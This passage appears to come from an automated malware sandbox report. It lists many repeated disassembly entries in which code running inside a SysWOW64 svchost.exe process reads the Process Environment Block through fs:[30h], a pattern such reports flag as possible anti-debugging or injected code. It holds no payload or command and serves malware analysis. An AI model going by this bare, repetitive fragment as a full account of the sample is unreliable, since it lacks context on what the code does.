                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h]1_2_02E34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2826B mov eax, dword ptr fs:[00000030h]1_2_02E2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB8243 mov eax, dword ptr fs:[00000030h]1_2_02EB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB8243 mov ecx, dword ptr fs:[00000030h]1_2_02EB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0625D mov eax, dword ptr fs:[00000030h]1_2_02F0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A250 mov eax, dword ptr fs:[00000030h]1_2_02E2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36259 mov eax, dword ptr fs:[00000030h]1_2_02E36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEA250 mov eax, dword ptr fs:[00000030h]1_2_02EEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEA250 mov eax, dword ptr fs:[00000030h]1_2_02EEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2823B mov eax, dword ptr fs:[00000030h]1_2_02E2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02E4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02E4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02E4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E663FF mov eax, dword ptr fs:[00000030h]1_2_02E663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEC3CD mov eax, dword ptr fs:[00000030h]1_2_02EEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h]1_2_02E383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h]1_2_02E383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h]1_2_02E383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h]1_2_02E383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB63C0 mov eax, dword ptr fs:[00000030h]1_2_02EB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h]1_2_02EDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h]1_2_02EDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02EDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h]1_2_02EDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED43D4 mov eax, dword ptr fs:[00000030h]1_2_02ED43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED43D4 mov eax, dword ptr fs:[00000030h]1_2_02ED43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h]1_2_02E2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h]1_2_02E2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h]1_2_02E2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5438F mov eax, dword ptr fs:[00000030h]1_2_02E5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5438F mov eax, dword ptr fs:[00000030h]1_2_02E5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h]1_2_02E28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h]1_2_02E28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h]1_2_02E28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED437C mov eax, dword ptr fs:[00000030h]1_2_02ED437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov ecx, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA352 mov eax, dword ptr fs:[00000030h]1_2_02EFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED8350 mov ecx, dword ptr fs:[00000030h]1_2_02ED8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0634F mov eax, dword ptr fs:[00000030h]1_2_02F0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F08324 mov eax, dword ptr fs:[00000030h]1_2_02F08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F08324 mov ecx, dword ptr fs:[00000030h]1_2_02F08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F08324 mov eax, dword ptr fs:[00000030h]1_2_02F08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F08324 mov eax, dword ptr fs:[00000030h]1_2_02F08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C310 mov ecx, dword ptr fs:[00000030h]1_2_02E2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E50310 mov ecx, dword ptr fs:[00000030h]1_2_02E50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02E2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E380E9 mov eax, dword ptr fs:[00000030h]1_2_02E380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB60E0 mov eax, dword ptr fs:[00000030h]1_2_02EB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02E2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E720F0 mov ecx, dword ptr fs:[00000030h]1_2_02E720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB20DE mov eax, dword ptr fs:[00000030h]1_2_02EB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E280A0 mov eax, dword ptr fs:[00000030h]1_2_02E280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC80A8 mov eax, dword ptr fs:[00000030h]1_2_02EC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF60B8 mov eax, dword ptr fs:[00000030h]1_2_02EF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02EF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3208A mov eax, dword ptr fs:[00000030h]1_2_02E3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5C073 mov eax, dword ptr fs:[00000030h]1_2_02E5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E32050 mov eax, dword ptr fs:[00000030h]1_2_02E32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6050 mov eax, dword ptr fs:[00000030h]1_2_02EB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A020 mov eax, dword ptr fs:[00000030h]1_2_02E2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C020 mov eax, dword ptr fs:[00000030h]1_2_02E2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6030 mov eax, dword ptr fs:[00000030h]1_2_02EC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB4000 mov ecx, dword ptr fs:[00000030h]1_2_02EB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F061E5 mov eax, dword ptr fs:[00000030h]1_2_02F061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E601F8 mov eax, dword ptr fs:[00000030h]1_2_02E601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF61C3 mov eax, dword ptr fs:[00000030h]1_2_02EF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF61C3 mov eax, dword ptr fs:[00000030h]1_2_02EF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E70185 mov eax, dword ptr fs:[00000030h]1_2_02E70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEC188 mov eax, dword ptr fs:[00000030h]1_2_02EEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEC188 mov eax, dword ptr fs:[00000030h]1_2_02EEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4180 mov eax, dword ptr fs:[00000030h]1_2_02ED4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4180 mov eax, dword ptr fs:[00000030h]1_2_02ED4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04164 mov eax, dword ptr fs:[00000030h]1_2_02F04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04164 mov eax, dword ptr fs:[00000030h]1_2_02F04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov ecx, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C156 mov eax, dword ptr fs:[00000030h]1_2_02E2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC8158 mov eax, dword ptr fs:[00000030h]1_2_02EC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36154 mov eax, dword ptr fs:[00000030h]1_2_02E36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36154 mov eax, dword ptr fs:[00000030h]1_2_02E36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60124 mov eax, dword ptr fs:[00000030h]1_2_02E60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov ecx, dword ptr fs:[00000030h]1_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF0115 mov eax, dword ptr fs:[00000030h]1_2_02EF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB06F1 mov eax, dword ptr fs:[00000030h]1_2_02EB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB06F1 mov eax, dword ptr fs:[00000030h]1_2_02EB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02E6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02E6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02E6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E666B0 mov eax, dword ptr fs:[00000030h]1_2_02E666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34690 mov eax, dword ptr fs:[00000030h]1_2_02E34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34690 mov eax, dword ptr fs:[00000030h]1_2_02E34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF866E mov eax, dword ptr fs:[00000030h]1_2_02EF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF866E mov eax, dword ptr fs:[00000030h]1_2_02EF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A660 mov eax, dword ptr fs:[00000030h]1_2_02E6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A660 mov eax, dword ptr fs:[00000030h]1_2_02E6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E62674 mov eax, dword ptr fs:[00000030h]1_2_02E62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4C640 mov eax, dword ptr fs:[00000030h]1_2_02E4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E627 mov eax, dword ptr fs:[00000030h]1_2_02E4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E66620 mov eax, dword ptr fs:[00000030h]1_2_02E66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68620 mov eax, dword ptr fs:[00000030h]1_2_02E68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3262C mov eax, dword ptr fs:[00000030h]1_2_02E3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE609 mov eax, dword ptr fs:[00000030h]1_2_02EAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72619 mov eax, dword ptr fs:[00000030h]1_2_02E72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02EBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E347FB mov eax, dword ptr fs:[00000030h]1_2_02E347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E347FB mov eax, dword ptr fs:[00000030h]1_2_02E347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02E3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB07C3 mov eax, dword ptr fs:[00000030h]1_2_02EB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E307AF mov eax, dword ptr fs:[00000030h]1_2_02E307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE47A0 mov eax, dword ptr fs:[00000030h]1_2_02EE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED678E mov eax, dword ptr fs:[00000030h]1_2_02ED678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38770 mov eax, dword ptr fs:[00000030h]1_2_02E38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
